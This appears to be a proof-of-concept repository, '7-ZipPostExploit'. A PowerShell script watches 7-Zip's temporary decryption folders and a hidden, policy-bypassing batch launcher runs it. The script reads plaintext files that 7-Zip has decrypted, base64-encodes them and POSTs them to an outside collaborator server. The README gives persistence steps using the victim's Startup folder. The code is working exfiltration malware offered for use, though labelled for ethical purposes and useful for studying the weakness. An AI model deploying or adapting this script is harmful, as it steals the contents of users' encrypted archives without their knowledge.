├── 7zipPostExp.bat ├── 7zipPostExp.ps1 ├── README.md └── index.html /7zipPostExp.bat: -------------------------------------------------------------------------------- 1 | powershell.exe -executionpolicy bypass -windowstyle hidden -file ..\7zipPostExp.ps1 2 | -------------------------------------------------------------------------------- /7zipPostExp.ps1: -------------------------------------------------------------------------------- 1 | # Author: Abdullah Alqeisi 2 | 3 | $username = $env:Username 4 | 5 | # Uncomment if the username in the environmental variable is two words and the one in the /users directory is only the first name of the user 6 | <#$username = "" 7 | foreach ($letter in $temp) { 8 | if($letter -ne ' '){$username += $letter} 9 | if($letter -eq ' '){break} 10 | }#> 11 | 12 | while(1) { 13 | 14 | if(Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' }){ 15 | 16 | foreach ($directory in (Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' })){ 17 | 18 | foreach ($filename in Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp\$directory\*.txt){ 19 | 20 | $filecontent= Get-Content $filename 21 | $filecontentbytes = [System.Text.Encoding]::UTF8.GetBytes($filecontent) 22 | $B64EncodedContent = [System.Convert]::ToBase64String($filecontentbytes) 23 | 24 | $target = "https://fo70z55wxi56zxob33p9oiq8hznpbe.burpcollaborator.net" #CHANGE URL 25 | $postParams = @{payload=$B64EncodedContent} 26 | Invoke-WebRequest -Uri $target -Method POST -Body $postParams 27 | 28 | } 29 | 30 | } 31 | 32 | } 33 | 34 | } 35 | 36 | 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 7-ZipPostExploit 2 | 3 | **FOR ETHICAL ACTIVITY PURPOSES** 4 | 5 | Tested on Version 19.00 6 | 7 | 7-Zip is a free and open-source file archiver, a utility used to place groups of files within compressed containers known as "archives". It is often used to encrypt sensitive file contents that are saved on disk. 8 | 9 | After analysis of the application and the code, the process of opening a file and then reencrypting was understood. 10 | 11 | 1. User inputs the password to open/edit files in an encrypted archive. 12 | 2. 7-Zip makes a new directory in the C:\Users\%USERNAME%\AppData\Local\Temp directory. The new directory has a fixed name that starts with "Rar$" followed by randomly generated numbers. 13 | 3. 7-Zip unencrypts the file(s) in the archive and places them in the above created directory, in plain text. 14 | 4. Once editing is done, 7-zip will reencrypt the data and save it on disk. 15 | 5. 7-Zip will delete the above created directory and delete the plain text files. 16 | 17 | During the duration of opening a file to edit it and closing the file, **the attacker has access to plaintext documents**. 18 | 19 | ## Script 20 | 21 | The powershell script in this repo is a **PoC for exfiltrating sensitive data encrypted by 7-zip** to an external attacker server. This is done in the **post exploitation** phase. 22 | 23 | **Steps** 24 | - Change the attacker's website in the script. 25 | - Add the batch file to the target's Startup folder (C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). 26 | - Add the powershell script in the preceding directory. 27 | 28 | **To do** 29 | - Add counters so that sent files are not resent to the attacker multiple times, generating unnecessary traffic. 30 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | --------------------------------------------------------------------------------